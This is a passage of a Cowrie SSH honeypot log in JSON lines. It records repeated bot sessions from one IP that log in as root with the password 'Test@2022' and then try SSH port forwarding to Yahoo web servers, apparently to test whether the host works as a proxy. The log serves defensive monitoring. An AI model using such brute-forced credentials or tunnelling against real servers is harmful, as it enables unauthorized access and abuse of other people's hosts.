sh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.352451Z","src_ip":"213.209.150.239","session":"5843090c9b07"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.636236Z","src_ip":"213.209.150.239","session":"5843090c9b07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":26021,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26021","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.694713Z","session":"5843090c9b07"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.751692Z","src_ip":"213.209.150.239","session":"5843090c9b07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":26447,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:26447","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.907310Z","session":"5843090c9b07"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.963975Z","src_ip":"213.209.150.239","session":"5843090c9b07"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.022311Z","src_ip":"213.209.150.239","session":"5843090c9b07"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1717,"dst_ip":"1.2.3.4","dst_port":22,"session":"3224c2ef4459","protocol":"ssh","message":"New connection: 213.209.150.239:1717 (1.2.3.4:22) [session: 3224c2ef4459]","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.068236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.069116Z","src_ip":"213.209.150.239","session":"3224c2ef4459"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.116321Z","src_ip":"213.209.150.239","session":"3224c2ef4459"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.351334Z","src_ip":"213.209.150.239","session":"3224c2ef4459"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":1559,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:1559","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.399729Z","session":"3224c2ef4459"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.446965Z","src_ip":"213.209.150.239","session":"3224c2ef4459"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":21993,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:21993","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.586001Z","session":"3224c2ef4459"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.633312Z","src_ip":"213.209.150.239","session":"3224c2ef4459"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.681212Z","src_ip":"213.209.150.239","session":"3224c2ef4459"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1760,"dst_ip":"1.2.3.4","dst_port":22,"session":"1227313fa35b","protocol":"ssh","message":"New connection: 213.209.150.239:1760 (1.2.3.4:22) [session: 1227313fa35b]","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.727462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.728584Z","src_ip":"213.209.150.239","session":"1227313fa35b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:48.775796Z","src_ip":"213.209.150.239","session":"1227313fa35b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.010935Z","src_ip":"213.209.150.239","session":"1227313fa35b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17930,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17930","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.059484Z","session":"1227313fa35b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.106959Z","src_ip":"213.209.150.239","session":"1227313fa35b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":31616,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31616","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.241697Z","session":"1227313fa35b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.288910Z","src_ip":"213.209.150.239","session":"1227313fa35b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.336878Z","src_ip":"213.209.150.239","session":"1227313fa35b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1810,"dst_ip":"1.2.3.4","dst_port":22,"session":"479bab2518e8","protocol":"ssh","message":"New connection: 213.209.150.239:1810 (1.2.3.4:22) [session: 479bab2518e8]","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.383102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.383973Z","src_ip":"213.209.150.239","session":"479bab2518e8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.431059Z","src_ip":"213.209.150.239","session":"479bab2518e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.666023Z","src_ip":"213.209.150.239","session":"479bab2518e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":31651,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31651","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.714254Z","session":"479bab2518e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.761557Z","src_ip":"213.209.150.239","session":"479bab2518e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":4214,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4214","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.897544Z","session":"479bab2518e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.944811Z","src_ip":"213.209.150.239","session":"479bab2518e8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:49.992981Z","src_ip":"213.209.150.239","session":"479bab2518e8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1857,"dst_ip":"1.2.3.4","dst_port":22,"session":"412e38c67680","protocol":"ssh","message":"New connection: 213.209.150.239:1857 (1.2.3.4:22) [session: 412e38c67680]","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.048749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.049802Z","src_ip":"213.209.150.239","session":"412e38c67680"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.106646Z","src_ip":"213.209.150.239","session":"412e38c67680"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.391575Z","src_ip":"213.209.150.239","session":"412e38c67680"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":23663,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:23663","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.449231Z","session":"412e38c67680"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.506179Z","src_ip":"213.209.150.239","session":"412e38c67680"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":471,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:471","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.663262Z","session":"412e38c67680"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.720666Z","src_ip":"213.209.150.239","session":"412e38c67680"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.779119Z","src_ip":"213.209.150.239","session":"412e38c67680"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1923,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9b30b5ad2f8","protocol":"ssh","message":"New connection: 213.209.150.239:1923 (1.2.3.4:22) [session: e9b30b5ad2f8]","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.825076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.825689Z","src_ip":"213.209.150.239","session":"e9b30b5ad2f8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:50.873040Z","src_ip":"213.209.150.239","session":"e9b30b5ad2f8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.108625Z","src_ip":"213.209.150.239","session":"e9b30b5ad2f8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":8692,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:8692","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.156922Z","session":"e9b30b5ad2f8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.204345Z","src_ip":"213.209.150.239","session":"e9b30b5ad2f8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23180,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23180","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.341567Z","session":"e9b30b5ad2f8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.388771Z","src_ip":"213.209.150.239","session":"e9b30b5ad2f8"}
